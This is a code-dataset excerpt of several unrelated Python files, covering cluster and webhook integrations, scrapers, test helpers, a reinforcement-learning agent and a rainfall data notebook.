\"infos\":\n api_client_instance = cm_client.ParcelsResourceApi(api_client)\n try:\n parcels = []\n for parcel in api_client_instance.read_parcels(params[\"cluster_name\"]).items:\n if params[\"product\"] is not None:\n # Info about a specific product?\n if params[\"product\"] != parcel.product:\n continue\n # Info about a specific version? \"Latest\" will not work here.\n # TODO: Regex and \"latest\" detection\n supposed_parcel = Parcel(params[\"product\"], params[\"version\"], params[\"cluster_name\"], api_client, module)\n if supposed_parcel.version != parcel.version:\n continue\n parcels.append(\n Parcel(\n name=parcel.product,\n version=parcel.version,\n cluster_name=parcel.cluster_ref.cluster_name,\n api_client=api_client,\n module=module\n ).meta()\n )\n module.exit_json(changed=False, msg=\"Parcels informations gathered\", meta=parcels)\n except ApiException as e:\n module.fail_json(msg=f\"Cluster error : {e}\")\n else:\n if params[\"product\"] is not None:\n parcel = Parcel(params[\"product\"], params[\"version\"], params[\"cluster_name\"], api_client, module)\n try:\n getattr(parcel, choice_map.get(params[\"state\"]))()\n except ApiException as e:\n module.fail_json(msg=f\"Cluster error : {e}\")\n module.exit_json(changed=parcel.changed, msg=f\"{parcel.name} is {parcel.stage}\", meta=parcel.meta())\n else:\n module.fail_json(changed=False,\n msg=\"No valid parameters combination was used: \\\"product\\\" is not set, exiting\", meta=[])\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cloudera_parcel_manager.py","file_name":"cloudera_parcel_manager.py","file_ext":"py","file_size_in_byte":9905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"358315594","text":"import datetime\nimport uuid\nfrom urllib.parse import urlparse\n\nimport math\nfrom flask import current_app\nfrom marshmallow import Schema\nfrom marshmallow import ValidationError, fields, post_load, validates, validates_schema\nfrom marshmallow import validate\nfrom marshmallow.validate import Range\nfrom werkzeug.exceptions import HTTPException\n\nfrom sword3common.constants import JSON_LD_CONTEXT, PackagingFormat\n\n__all__ = [\"ByReferenceSchema\"]\n\n\nclass ByReferenceFileDefinition:\n def __init__(\n self,\n *,\n url: str = None,\n temporary_id: uuid.UUID = None,\n content_disposition: str,\n content_type: str,\n content_length: int = None,\n dereference: bool,\n packaging: str,\n ttl: datetime.datetime = None\n ):\n assert url or temporary_id\n self.url = url\n self.temporary_id = temporary_id\n self.content_disposition = content_disposition\n self.content_type = content_type\n self.content_length = content_length\n self.dereference = dereference\n self.packaging = packaging\n self.ttl = ttl\n\n\nclass _ByReferenceFileSchema(Schema):\n url = fields.Url(data_key=\"@id\", required=True)\n content_disposition = fields.String(data_key=\"contentDisposition\", required=True)\n content_length = fields.Integer(data_key=\"contentLength\", strict=True)\n content_type = fields.String(data_key=\"contentType\", required=True)\n dereference = fields.Boolean(required=True)\n packaging = fields.String(missing=PackagingFormat.Binary)\n ttl = fields.AwareDateTime()\n\n @validates_schema\n def validate_url(self, data, **kwargs):\n parsed_url = urlparse(data[\"url\"])\n if parsed_url.hostname == self.context[\"url_adapter\"].server_name:\n try:\n rule, rv = self.context[\"url_adapter\"].match(parsed_url.path)\n except HTTPException:\n return None\n if rule == \"invenio_sword.temporary_url\":\n data[\"temporary_id\"] = rv[\"temporary_id\"]\n del data[\"url\"]\n\n @post_load\n def make_object(self, data, **kwargs):\n return ByReferenceFileDefinition(**data)\n\n\nclass ByReferenceSchema(Schema):\n jsonld_context = fields.String(\n data_key=\"@context\",\n validate=[validate.OneOf([JSON_LD_CONTEXT])],\n required=True,\n )\n jsonld_type = fields.String(\n data_key=\"@type\", validate=[validate.OneOf([\"ByReference\"])], required=True,\n )\n files = fields.List(\n fields.Nested(_ByReferenceFileSchema),\n data_key=\"byReferenceFiles\",\n required=True,\n )\n\n\nclass SegmentInitSchema(Schema):\n \"\"\"For validating parameters on `Content-Disposition: segment-init` headers\"\"\"\n\n # validate parameters are lambdas to defer accessing current_app until we're inside the application context\n\n size = fields.Integer(\n required=True,\n validate=lambda value: Range(\n current_app.config[\"FILES_REST_MULTIPART_MAX_PARTS\"]\n ),\n )\n segment_count = fields.Integer(\n required=True,\n validate=lambda value: Range(\n 1, current_app.config[\"FILES_REST_MULTIPART_MAX_PARTS\"]\n ),\n )\n segment_size = fields.Integer(\n required=True,\n validate=lambda value: Range(\n current_app.config[\"FILES_REST_MULTIPART_CHUNKSIZE_MIN\"],\n current_app.config[\"FILES_REST_MULTIPART_CHUNKSIZE_MAX\"],\n )(value),\n )\n\n @validates_schema\n def validate_segment_count(self, data, **kwargs):\n if data[\"segment_count\"] != math.ceil(data[\"size\"] / data[\"segment_size\"]):\n raise ValidationError(\n {\n \"segment_count\": \"Wrong number of segments for given size and segment_size.\"\n }\n )\n\n\nclass SegmentUploadSchema(Schema):\n segment_number = fields.Integer(required=True)\n\n def __init__(self, *args, segment_count, **kwargs):\n self._segment_count = segment_count\n super().__init__(*args, **kwargs)\n\n @validates(\"segment_number\")\n def validate_segment_number(self, value):\n return Range(1, self._segment_count)(value)\n","sub_path":"invenio_sword/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"325625295","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import http\nfrom odoo.http import request, route\nimport json\nimport time\nimport logging\n\nclass Webhooks(http.Controller):\n @route('/webhooks', type='json', auth=\"public\")\n def index(self, **kw):\n\n args = json.loads(request.httprequest.data)\n producer = 'stores/' + request.env[\"res.config.settings\"].sudo().obtener_store_hash()\n if args and args['producer'] and args['producer'] == producer and args['scope'] and args['data'] and args['data']['id']:\n #Customers\n if args['scope'] == 'store/customer/created':\n logging.warn('Webhook - Customers - created')\n params = [{'id:in': args['data']['id']}]\n request.env['sinc_bigcommerce.res_partner'].sudo().transferir_bc_odoo(params)\n elif args['scope'] == 'store/customer/updated':\n time.sleep(3)\n logging.warn('Webhook - Customers - updated')\n params = [{'id:in': args['data']['id']}]\n request.env['sinc_bigcommerce.res_partner'].sudo().transferir_bc_odoo(params)\n #Address\n elif args['scope'] == 'store/customer/address/created':\n logging.warn('Webhook - Address - created')\n params = [{'customer_id:in': args['data']['address']['customer_id']}, {'id:in': args['data']['id']}]\n request.env['sinc_bigcommerce.res_partner_address'].sudo().transferir_bc_odoo(params)\n elif args['scope'] == 'store/customer/address/updated':\n time.sleep(3)\n logging.warn('Webhook - Address - updated')\n params = [{'customer_id:in': args['data']['address']['customer_id']}, {'id:in': args['data']['id']}]\n request.env['sinc_bigcommerce.res_partner_address'].sudo().transferir_bc_odoo(params)\n #Orders\n elif args['scope'] == 'store/order/statusUpdated' and args['data']['status'] and args['data']['status']['previous_status_id'] == 11 and args['data']['status']['new_status_id'] == 9:\n logging.warn('Webhook - Orders')\n params = [{'order_id': args['data']['id']}]\n request.env['sinc_bigcommerce.sale'].sudo().transferir_bc_odoo(params)\n","sub_path":"controllers/webhooks.py","file_name":"webhooks.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"256526084","text":"import http.client\nimport json\nimport time\nimport sys\nimport collections\nimport time\nimport json\nimport random\n\n# Can get info of 200 routes per call\napi_key = '' # USER YOUR OWN API KEY\nstart_index = 0\ncounter = 0\nfor end_index in range(200, len(all_routes), 200):\n print(start_index)\n\n # Collect 200 routes\n bolus_of_routes = all_routes[start_index:end_index]\n\n # Convert all elements to dtype string\n bolus_of_routes = [str(i) for i in bolus_of_routes]\n\n # takes list and concatenates elements with , as separator\n string_of_routes = \",\".join(bolus_of_routes)\n\n # Setup connection\n conn = http.client.HTTPSConnection(\"www.mountainproject.com\", timeout=180)\n payload = \"{}\"\n\n # Make request\n conn.request(\"GET\", \"/data/get-routes?routeIds=\" + string_of_routes + \"&key=\" + api_key, payload)\n\n # Get response\n res = conn.getresponse()\n\n # Collect data\n data = res.read()\n\n # Unpackage json object and extract relevant info\n inventory = json.loads(data)\n route_info = inventory['routes']\n\n # Write array to file\n with open(\"route_data/routes_\" + str(counter) + '.json', 'w') as outfile:\n json.dump(route_info, outfile)\n\n # Used for next iteration\n start_index = end_index\n counter += 1\n\n # OPTIONAL: Sleep randomly, just a precaution for too many API calls\n time.sleep(random.randint(1, 30))\n","sub_path":"getScripts/getRoutes.py","file_name":"getRoutes.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123581265","text":"import pickle\nimport jieba\n\n\n\nCasePath = './raw_data/case.bin'\nLawPath = './raw_data/divorce_full.txt'\n\n\nclass Result(object):\n def __init__(self, result):\n self.plea = result[0]\n self.raw_result = result[1]\n self.result = result[2] # binary\n self.extracted_law = result[3]\n\n\nclass DataInstance(object):\n def __init__(self, instance):\n self.fact = instance[0][0]\n self.pleas = instance[0][1]\n self.law = instance[0][2]\n self.raw_result = instance[3]\n self.result = [Result(Plea) for Plea in instance[4]]\n\n\nclass Reader(object):\n def __init__(self):\n self.law = {'divorce': [],\n 'child': [],\n 'maintenance': []}\n self.cases = []\n self._load()\n\n def _load(self):\n print(\"Start to load law text.\")\n with open(LawPath, \"r\")as f:\n laws = f.readlines()\n laws = list(map(lambda x: list(\n filter(lambda x: len(x) > 0, list(jieba.cut(x.strip().replace(' ', ''), cut_all=False)))\n ), laws))\n print(\"law articles loaded.\")\n self.law['divorce'].extend(laws[:26])\n self.law['child'].extend(laws[26:38])\n self.law['maintenance'].extend(laws[38:])\n\n with open(CasePath, \"rb\")as f:\n raw_data = pickle.load(f)\n self.cases.extend([DataInstance(instance) for instance in raw_data])\n print(\"cases loaded.\")\n","sub_path":"tools/Reader.py","file_name":"Reader.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"291690555","text":"\"\"\"\r\nDemo of working with Checkboxes using Selenium Webdriver\r\n\"\"\"\r\n\r\nfrom selenium import webdriver\r\n\r\n\r\ndriver = webdriver.Chrome()\r\n\r\n#save the url to navigate to\r\nurl = 'http://localhost/checkbox-radio.html'\r\n\r\n#Navigate to the url\r\ndriver.get(url)\r\n\r\ndef assert_element_is_checkbox(element):\r\n \"\"\"\r\n Function to check a passed in element is a html checkbox element.\r\n Raises an assertion exception if the element is not a checkbox.\r\n :param element: the element object to be checked\r\n \"\"\"\r\n\r\n my_element_type = element.get_attribute('type') #getting the type attribute..normally associated with an input\r\n\r\n if my_element_type != 'checkbox': #checking if its a checkbox\r\n raise AssertionError('The passed is not a checkbox')\r\n\r\n return\r\n\r\ndef is_checkbox_selected(element):\r\n \"\"\"\r\n Function to check if a checkbox is checked or not.\r\n It will return 'True' if checked or 'False' if not checked.\r\n :param element:\r\n :return: boolean\r\n \"\"\"\r\n\r\n assert_element_is_checkbox(element)\r\n\r\n if element.is_selected(): #is checkbox selected\r\n return True\r\n else:\r\n return False\r\n\r\ndef assert_checkbox_is_selected(element):\r\n \"\"\"\r\n Function to assert if a check box is select.\r\n Will raise an assertion exception if the passed in element is not a check box or it is not checked.\r\n :param element:\r\n :return:\r\n \"\"\"\r\n assert_element_is_checkbox(element)\r\n\r\n if not is_checkbox_selected(element):\r\n raise AssertionError('The element is not selected.')\r\n\r\n return\r\n\r\ndef assert_checkbox_is_enabled(element):\r\n \"\"\"\r\n Function to verify if the passed in element is enabled. Enabled element is clickable/selectable.\r\n Raises an assertion exception if the element is not checkbox or is not enabled.\r\n :param element:\r\n :return:\r\n \"\"\"\r\n assert_element_is_checkbox(element)\r\n\r\n if not element.is_enabled(): #checking if its enabled or not\r\n raise AssertionError('The checkbox is not enabled.')\r\n\r\n\r\n# Start of function calls\r\n\r\njava_box = driver.find_element_by_name('java')\r\n\r\nprint(is_checkbox_selected(java_box))\r\nassert_checkbox_is_enabled(java_box)\r\n\r\nphp_box = driver.find_element_by_name('php')\r\nprint(php_box.is_enabled())\r\n","sub_path":"src/checkboxr.py","file_name":"checkboxr.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453772786","text":"\nimport cv2\nimport sys\nimport numpy\n\ndef main(argv):\n\n img = cv2.imread(\"input\\\\Image1.jpg\",cv2.IMREAD_GRAYSCALE)\n\n\n # kernel = numpy.ones((3,3),numpy.uint8)\n # cv2.filter2D(img,-1,kernel,img)\n\n # th = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n # cv2.THRESH_BINARY,13,2)\n\n blur = cv2.GaussianBlur(img,(3,3),0)\n ret3,th3 = cv2.threshold(blur,0,255,cv2.THRESH_OTSU)\n\n\n\n #erosion = cv2.erode(img,kernel,iterations = 1)\n #dilation = cv2.dilate(erosion,kernel,iterations = 1)\n\n cv2.imwrite(\"output\\\\image.jpg\",th3)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"[3]OpenCV - limpezire text/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"33123302","text":"import json\nimport logging\nimport os\nimport time\nimport traceback\nfrom datetime import datetime, timedelta\n\nimport itchat\nimport pytz\nimport requests\nfrom fake_useragent import UserAgent\n\nUSE_ITCHAT = False\nWECHAT_GROUP_NAME = '豆瓣开车小组'\n\nFILE_NAME_DETECTED_IDS = 'detected_ids.txt'\nFILE_NAME_SERVER_CHAN_KEY = 'sckey.key'\n\nSLEEP_TIME_NORMAL = 6\nSLEEP_TIME_WHEN_EXCEPTION = 60\n\n\ndef get_logger():\n logger = logging.getLogger(__name__)\n\n formatter = logging.Formatter(\"%(asctime)s: %(filename)s [line:%(lineno)d]: [%(levelname)s]: %(message)s\")\n\n handler1 = logging.StreamHandler()\n handler2 = logging.FileHandler(filename=\"main.log\")\n\n handler1.setLevel(logging.DEBUG)\n handler2.setLevel(logging.DEBUG)\n\n handler1.setFormatter(formatter)\n handler2.setFormatter(formatter)\n\n logger.addHandler(handler1)\n logger.addHandler(handler2)\n\n return logger\n\n\ndef send_msg(title, msg):\n def _send_msg_by_itchat():\n room = itchat.search_chatrooms(WECHAT_GROUP_NAME)[0]\n room.send(msg)\n\n def _send_msg_by_server_chan():\n with open(FILE_NAME_SERVER_CHAN_KEY) as f:\n sckey = f.read().strip()\n url = f'http://sc.ftqq.com/{sckey}.send'\n params = {\n 'text': title,\n 'desp': msg,\n }\n requests.get(url, params=params)\n\n if USE_ITCHAT:\n _send_msg_by_itchat()\n else:\n _send_msg_by_server_chan()\n\n\ndef is_time_ok(dt):\n if datetime.now(pytz.timezone('Asia/Shanghai')).replace(tzinfo=None) - datetime.strptime(dt, '%Y-%m-%d %H:%M:%S') < timedelta(seconds=24 * 3600):\n return True\n\n\ndef get_detected_ids():\n if os.path.exists(FILE_NAME_DETECTED_IDS):\n with open(FILE_NAME_DETECTED_IDS) as f:\n return json.load(f)\n return []\n\n\ndef set_detected_ids(ids):\n with open(FILE_NAME_DETECTED_IDS, 'w+') as f:\n json.dump(ids, f)\n\n\ndef main():\n logger = get_logger()\n\n if USE_ITCHAT:\n itchat.auto_login(hotReload=True)\n\n detected_ids = get_detected_ids()\n url = 'https://api.douban.com/v2/group/656297/topics?start=0&count=100'\n\n while True:\n time.sleep(SLEEP_TIME_NORMAL)\n\n try:\n headers = {'User-Agent': UserAgent().random}\n resp = requests.get(url, headers=headers)\n if resp.status_code != 200:\n logger.error(f'Got status_code: {resp.status_code}')\n logger.error(f'resp.content: {resp.content}')\n continue\n\n if 'json' not in resp.headers['Content-Type']:\n logger.error(f'Got Content-Type: {resp.headers[\"Content-Type\"]}')\n logger.error(f'resp.content: {resp.content}')\n continue\n\n resp = resp.json()\n if 'topics' not in resp:\n logger.error(f'No topics in resp: {resp}')\n logger.error(f'json data: {resp}')\n continue\n\n for i in resp['topics']:\n id_ = i['id']\n title = i['title']\n url = i['alt']\n create_date = i['created']\n if '【开车】' in title and is_time_ok(create_date) and id_ not in detected_ids:\n msg = f'{title}\\n' \\\n f'{url}\\n' \\\n f'发布时间:{create_date}'\n logger.info(msg.replace('\\n', '\\t'))\n send_msg(title, msg)\n detected_ids.append(id_)\n set_detected_ids(detected_ids)\n except Exception as e:\n logger.error(traceback.format_exc())\n continue\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"105490971","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.utils import timezone\nfrom .models import Message\nimport logging\n\n# Create your views here.\n\n\ndef ask(request, uid, channel, platform, hostname, version):\n t = 'message/ask_sg.html'\n d = {\n 'uid': int(uid),\n 'channel': channel,\n 'platform': platform,\n 'hostname': hostname,\n 'version': version,\n }\n d['error_message'] = int(request.GET.get('error_message', 0))\n if request.method == 'POST':\n if request.POST.get('content') and len(request.POST.get('content')) < 200:\n m = Message(\n title=request.POST.get('title'),\n content=request.POST.get('content'),\n channel=channel,\n platform=platform,\n hostname=hostname,\n uid=uid,\n pub_date=timezone.now()\n )\n try:\n m.save()\n logger = logging.getLogger(__name__)\n l = \"%(uid)s|%(channel)s|%(platform)s|%(hostname)s|%(version)s\" % d\n cen = m.content.replace('\\r\\n', '\\\\n')\n cen = cen.replace('\"', '')\n cen = cen.replace(\"'\", '')\n l = l + \"|\" + m.title + \"|\" + cen\n logger.info(l)\n d['error_message'] = 3\n except Exception as e:\n d['error_message'] = 2\n elif len(request.POST.get('content')) >= 200:\n d['error_message'] = 4\n else:\n d['error_message'] = 1\n url = reverse('message:ask', args=(\n uid,\n channel,\n platform,\n hostname,\n version))\n url = url + '?error_message=' + str(d['error_message'])\n return HttpResponseRedirect(url)\n return render(request, t, d)\n","sub_path":"message/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"644467040","text":"import pytest\n\nfrom ex4.best_price import best_price\n\n\n@pytest.mark.parametrize(\"a1, a2, a3, b1, b2, b3, expected_price\", [\n (1, 2, 3, 3, 2, 1, 14)\n])\ndef test_best_price(a1: int, a2: int, a3: int, b1: int, b2: int, b3: int, expected_price: int):\n price = best_price(a1, a2, a3, b1, b2, b3)\n assert price == expected_price\n","sub_path":"ex4/best_price_test.py","file_name":"best_price_test.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"247558932","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport sys\r\nfrom khh.py27.communication.network.util.NetWorkUtil import *\r\n\r\n\r\nimport MySQLdb\r\n\r\n# Open database connection\r\ndb = MySQLdb.connect(\"localhost\",\"root\",\"javadev\",\"search\" )\r\n\r\n# prepare a cursor object using cursor() method\r\ncursor = db.cursor()\r\n\r\n\r\n\r\n\r\n\r\n\r\nsite_list =[\r\n [\"A001\" ,\"KB국민은행\"],\r\n [\"A002\" ,\"우리은행\"],\r\n [\"A003\" ,\"신한은행\"],\r\n [\"A004\" ,\"하나은행\"],\r\n [\"A005\" ,\"스탠다드차타드은행\"],\r\n [\"A006\" ,\"한국씨티은행\"],\r\n [\"A007\" ,\"외환은행\"],\r\n [\"A008\" ,\"대구은행\"],\r\n [\"A009\" ,\"부산은행\"],\r\n [\"A010\" ,\"광주은행\"],\r\n [\"A011\" ,\"경남은행\"],\r\n [\"A012\" ,\"전북은행\"],\r\n [\"A013\" ,\"제주은행\"],\r\n [\"A014\" ,\"농협\"],\r\n [\"A015\" ,\"수협\"],\r\n [\"A016\" ,\"한국산업은행\"],\r\n [\"A017\" ,\"기업은행\"],\r\n [\"A018\" ,\"신협\"],\r\n [\"A019\" ,\"우체국\"],\r\n [\"A020\" ,\"새마을금고\"],\r\n [\"C001\" ,\"신한카드\"],\r\n [\"C002\" ,\"광주카드\"],\r\n [\"C003\" ,\"롯데카드\"],\r\n [\"C004\" ,\"삼성카드\"],\r\n [\"C005\" ,\"씨티카드\"],\r\n [\"C006\" ,\"전북카드\"],\r\n [\"C007\" ,\"하나카드\"],\r\n [\"C008\" ,\"현대카드\"],\r\n [\"C009\" ,\"BC카드\"],\r\n [\"C010\" ,\"KB카드\"],\r\n [\"C011\" ,\"NH카드\"],\r\n [\"E001\" ,\"홈택스(국세청)\"],\r\n [\"E002\" ,\"케이노트\"],\r\n [\"E003\" ,\"센드빌\"],\r\n [\"E004\" ,\"스마트빌\"],\r\n [\"E005\" ,\"트러스빌\"],\r\n [\"E006\" ,\"세무로\"],\r\n [\"E007\" ,\"WebTax21\"],\r\n [\"E008\" ,\"Billmate\"],\r\n [\"E009\" ,\"다큐빌\"],\r\n [\"E010\" ,\"TaxBill365\"],\r\n [\"E011\" ,\"Bill36524\"],\r\n [\"E012\" ,\"유노트\"],\r\n [\"E013\" ,\"서울외국환중개\"],\r\n [\"E014\" ,\"외환은행 환율\"],\r\n [\"E015\" ,\"한국은행경제통계시스템\"],\r\n [\"E016\" ,\"KOFIA BIS 경제지표\"],\r\n [\"E017\" ,\"여신금융협회 장부관리\"],\r\n [\"E018\" ,\"하이웍스빌 장부관리(전자세금계산서발행)\"],\r\n [\"E019\" ,\"세틀뱅크 가상계좌\"],\r\n [\"E020\" ,\"한국증권금융\"],\r\n [\"E021\" ,\"HSBC Direct\"],\r\n [\"E022\" ,\"신한금융투자\"],\r\n [\"E023\" ,\"신영증권\"],\r\n [\"E024\" ,\"우리투자증권\"],\r\n [\"E025\" ,\"유안타증권\"],\r\n [\"F001\" ,\"핑거\"],\r\n [\"F002\" ,\"인사이드뱅크 업데이트더존 업데이트 서버\"],\r\n [\"F003\" ,\"인사이드뱅크 더존 공지사항 서버\"],\r\n [\"S001\" ,\"nprotect\"],\r\n [\"S002\" ,\"안랩\"],\r\n [\"S003\" ,\"소프트캠프\"],\r\n [\"S004\" ,\"라온시큐어\"],\r\n [\"S005\" ,\"initech\"],\r\n [\"S006\" ,\"nsmartad\"],\r\n [\"S007\" ,\"nsmartad\"],\r\n [\"S008\" ,\"verisign\"],\r\n [\"S009\" ,\"cyveillance\"],\r\n [\"S010\" ,\"symcd\"],\r\n [\"S011\" ,\"digicert\"],\r\n [\"I001\" ,\"아이퀘스트\"]\r\n ]\r\n\r\n\r\nfor atSite in site_list: \r\n site_seq = atSite[0].strip();\r\n name = atSite[1].strip();\r\n #print(site_seq+\" \"+name)\r\n query = 'INSERT INTO SITE VALUES(\"'+site_seq+'\",\"'+name+'\");';\r\n print(query)\r\n #cursor.execute(query);\r\n\r\n\r\n# execute SQL query using execute() method.\r\n\r\n# Fetch a single row using fetchone() method.\r\n#data = cursor.fetchone()\r\n#print \"Database version : %s \" % data\r\n\r\n# disconnect from server\r\ndb.commit();\r\ndb.close()\r\n\r\n\r\n\r\n#scriptpath = \"./khh/py27/communication/network/util/NetWorkUtil.py\"\r\n# Add the directory containing your module to the Python path (wants absolute paths)\r\n#sys.path.append(os.path.abspath(scriptpath))\r\n\r\n#ip = foward_lookup(\"ahnlabdownload.nefficient.co.kr\");\r\n#print ip\r\n#ip = foward_lookup(\"ahnlabdownload.nefficient.co.kr\");\r\n#print ip\r\n#ip = foward_lookup(\"ahnlabdownload.nefficient.co.kr\");\r\n#print ip\r\n#ip = foward_lookup(\"ahnlabdownload.nefficient.co.kr\");\r\n#print ip\r\n ","sub_path":"finger/host_search/InsertSITE.py","file_name":"InsertSITE.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"300333342","text":"import configparser\n\nimport torch\nfrom torch import optim\nfrom torch.distributions import Categorical\nimport torch.nn.functional as F\n\nfrom agent import AgentBase\n\nfrom NN import Conv2D_NN\n\n\nclass AgentSQN(AgentBase):\n\n def __init__(self, i, obs_shape, device, start=None, goal=None, config=None):\n super().__init__(i, device, start, goal)\n\n # SQL stuff\n self.policy_model = Conv2D_NN(device=self.device, dict_size=obs_shape[1],\n window_size=obs_shape[-1], num_actions=len(self.actions)).to(self.device)\n\n self.target_model = Conv2D_NN(device=self.device, dict_size=obs_shape[1],\n window_size=obs_shape[-1], num_actions=len(self.actions)).to(self.device)\n\n self.target_model.load_state_dict(self.policy_model.state_dict())\n self.target_model.eval()\n\n if config is None:\n config = configparser.ConfigParser()\n config.read(\"config.ini\")\n\n params = config[\"SQN Parameters\"]\n\n # Entropy weighting\n self.alpha = params.getfloat(\"alpha\")\n\n # Batch size\n self.batch_size = params.getint(\"batch_size\")\n\n # Learning rate for the Q table update equation\n self.learning_rate = params.getfloat(\"learning_rate\")\n\n # Discount factor for the Q-table update equation\n self.discount_factor = params.getfloat(\"discount_factor\")\n\n # Step delay before target_model update\n self.update_steps = params.getint(\"update_period\")\n self._learned_steps = 0\n\n self.optimizer = optim.Adam(self.policy_model.parameters(), lr=self.learning_rate)\n\n def select_action(self, observation):\n\n # Shape of observation is (N_batch, Channels_in, Height, Width)\n # observation = torch.FloatTensor(observation).to(self.device) # No longer need to flatten it\n observation = observation.float()\n\n with torch.no_grad():\n # Compute soft Action-Value Q values\n q_values = self.policy_model(observation)\n # Compute soft-Value V values\n v_values = self.alpha * torch.logsumexp(q_values / self.alpha, dim=1, keepdim=True)\n # Compute distribution\n dist = torch.exp((q_values - v_values) / self.alpha)\n dist = dist / torch.sum(dist)\n c = Categorical(dist)\n a = c.sample()\n return a.view(1,) # Want a 1D tensor returned\n\n def select_greedy_action(self, observation):\n observation = observation.float()\n return self.policy_model(observation).max(1)[1].view(1,)\n\n\n def train(self):\n if len(self.experience_replay) < self.batch_size:\n return 0\n\n transitions = self.sample_buffer(self.batch_size)\n\n # Converts batch-array of Transitions to Transition of batch-arrays.\n # [Transition(...), Transition(...)] ---> Transition(observation = [...], ...)\n batch = AgentBase.Transition(*zip(*transitions))\n\n state_batch = torch.cat(batch.state).to(self.device)\n action_batch = torch.cat(batch.action).unsqueeze(1).to(self.device)\n reward_batch = torch.cat(batch.reward).unsqueeze(1).to(self.device)\n\n # Compute a mask of non-final states and concatenate the batch elements\n # (a final state would've been the one after which simulation for this agent ended)\n non_final_mask = ~torch.tensor(batch.done, device=self.device, dtype=torch.bool)\n non_final_next_states = torch.cat(batch.next_state)[non_final_mask].to(self.device)\n\n # Compute Q(s_t, a)\n state_action_values = self.policy_model(state_batch) \\\n .gather(1, action_batch.long())\n\n # Compute the expected values\n with torch.no_grad():\n # Compute soft-Q(s_{t+1}, .) for every actions for every states that has a next state\n next_state_q_values = self.target_model(non_final_next_states)\n # Compute soft-V(s_{t+1}) for all the next state\n next_state_values = torch.zeros((self.batch_size, 1), device=self.device)\n next_state_values[non_final_mask] = self.alpha * torch.logsumexp(next_state_q_values / self.alpha,\n dim=1,\n keepdim=True)\n # Compute expected Q-values\n expected_q = (next_state_values * self.discount_factor) + reward_batch\n expected_q = expected_q.float()\n\n loss = F.mse_loss(state_action_values, expected_q)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n self._learned_steps += 1\n\n if self._learned_steps % self.update_steps == 0:\n # Update the target network, copying all weights and biases\n self.target_model.load_state_dict(self.policy_model.state_dict())\n self._learned_steps = 0\n\n return loss.item()\n\n def save(self, path):\n torch.save(self.policy_model.state_dict(), path)\n\n def load(self, path):\n self.policy_model.load_state_dict(torch.load(path))\n self.target_model.load_state_dict(self.policy_model.state_dict())\n\n\nclass CoordinatorSQN(AgentSQN):\n def __init__(self, agents, obs_shape, device, config=None):\n super().__init__(0, obs_shape, device, start=None, goal=None, config=config)\n self.agents = agents\n\n def train(self) -> float:\n loss = super().train()\n\n # if self._learned_steps % self.update_steps == 0:\n for agent in self.agents:\n agent.policy_model.load_state_dict(self.policy_model.state_dict())\n\n return loss\n","sub_path":"SQN.py","file_name":"SQN.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410019381","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn import metrics\n\n\n# In[2]:\n\n\n#data collection\ndata = pd.read_csv(\"rainfall in india 1901-2015.csv\")\ndata.head()\n\n\n# In[3]:\n\n\ndata.info()\n\n\n# In[4]:\n\n\n# date preprocessing\ndata.isnull().sum()\n\n\n# In[5]:\n\n\n\ndata.duplicated().sum()\n\n\n# In[6]:\n\n\ndata['SUBDIVISION'].value_counts()\n\n\n# In[7]:\n\n\ndata.mean()\n\n\n# In[8]:\n\n\ndata = data.fillna(data.mean())\n\n\n# In[9]:\n\n\ndata.head(3)\n\n\n# In[10]:\n\n\n\ndata.isnull().any()\n\n\n# In[11]:\n\n\ndata.YEAR.unique()\n\n\n# In[12]:\n\n\ndata.describe()\n\n\n# In[13]:\n\n\ndata.shape\n\n\n# In[14]:\n\n\n# data visulization\ndata[[\"SUBDIVISION\",\"ANNUAL\"]].groupby(\"SUBDIVISION\").sum().sort_values(by='ANNUAL',ascending=False).plot(kind='barh',stacked=True,figsize=(15,10))\nplt.xlabel(\"Rainfall in MM\",size=12)\nplt.ylabel(\"Sub-Division\",size=12)\nplt.title(\"Annual Rainfall v/s SubDivisions\")\nplt.grid(axis=\"x\",linestyle=\"-.\")\nplt.show()\n\n\n# 